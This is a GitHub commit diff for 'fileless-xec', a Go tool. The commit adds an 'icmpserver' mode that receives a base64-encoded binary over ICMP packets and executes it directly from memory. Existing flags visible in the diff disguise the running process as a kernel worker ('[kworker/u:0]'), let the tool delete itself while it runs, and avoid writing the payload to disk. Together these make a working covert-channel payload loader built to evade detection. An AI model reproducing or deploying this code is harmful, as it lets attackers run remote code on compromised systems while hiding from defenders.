Add icmp support

ariary · Nov 21, 2021 · b236c54 · b236c54
1 parent 45c897a
commit b236c54
Show file tree

Hide file tree

Showing 3 changed files with 52 additions and 0 deletions.
diff --git a/cmd/fileless-xec/fileless-xec.go b/cmd/fileless-xec/fileless-xec.go
@@ -72,12 +72,32 @@ func main() {
 		},
 	}
 
+	//ICMP SERVER MODE
+
+	var cmdIcmpServer = &cobra.Command{
+		Use:   "icmpserver [listening_ip]",
+		Short: "Use fileless-xec with icmp protocol to retrieve binary from remote",
+		Args:  cobra.MinimumNArgs(1),
+		Run: func(cmd *cobra.Command, args []string) {
+			listening := args[0]
+
+			// get argument for binary execution
+			argsExec := []string{name}
+			argsExec = append(argsExec, args[1:]...) //argument if binary execution need them fileless-xec <binary_url> -- <flags> <values>
+			environ := os.Environ()
+			cfg := &config.Config{Unstealth: unstealth, ArgsExec: argsExec, SelfRm: selfRm, Environ: environ}
+
+			server.ICMPServerAndExecute(listening, cfg)
+		},
+	}
+
 	//flag handling
 	cmdFilelessxec.PersistentFlags().StringVarP(&name, "name", "n", "[kworker/u:0]", "running process name")
 	cmdFilelessxec.PersistentFlags().BoolVarP(&http3, "http3", "Q", false, "use of HTTP3 (QUIC) protocol")
 	cmdFilelessxec.PersistentFlags().BoolVarP(&selfRm, "self-remove", "r", false, "remove fileless-xec while its execution. fileless-xec must be in the same repository that the execution process")
 	cmdFilelessxec.PersistentFlags().BoolVarP(&unstealth, "unstealth", "u", false, "store the file locally on disk before executing it. Not stealth, but useful if your system does not support mem_fd syscall")
 
 	cmdFilelessxec.AddCommand(cmdServer)
+	cmdFilelessxec.AddCommand(cmdIcmpServer)
 	cmdFilelessxec.Execute()
 }
diff --git a/go.mod b/go.mod
@@ -3,6 +3,7 @@ module fileless-xec
 go 1.16
 
 require (
+	github.com/ariary/QueenSono v1.1.1
 	github.com/creack/pty v1.1.17
 	github.com/justincormack/go-memfd v0.0.0-20170219213707-6e4af0518993
 	github.com/lucas-clemente/quic-go v0.24.0

diff --git a/pkg/server/icmpserver.go b/pkg/server/icmpserver.go
@@ -0,0 +1,31 @@
+package server
+
+import (
+	b64 "encoding/base64"
+	"fileless-xec/pkg/config"
+	"fileless-xec/pkg/exec"
+	"log"
+
+	"github.com/ariary/QueenSono/pkg/icmp"
+)
+
+//Wait for ICMP packet containing binary content and execute it
+func ICMPServerAndExecute(listening string, cfg *config.Config) {
+
+	size, _ := icmp.GetMessageSizeAndSender(listening)
+	binary, missed := icmp.Serve(listening, size, false)
+	if len(missed) > 0 {
+		log.Fatal("Does not received all icmp packets")
+	}
+
+	decodedB, _ := b64.RawStdEncoding.DecodeString(binary)
+	// if err != nil {
+	// 	fmt.Println(err)
+	// 	os.Exit(1)
+	// }
+	// -> illegal base64 data at input byte 2842501
+
+	cfg.BinaryContent = string(decodedB)
+	exec.Filelessxec(cfg)
+
+}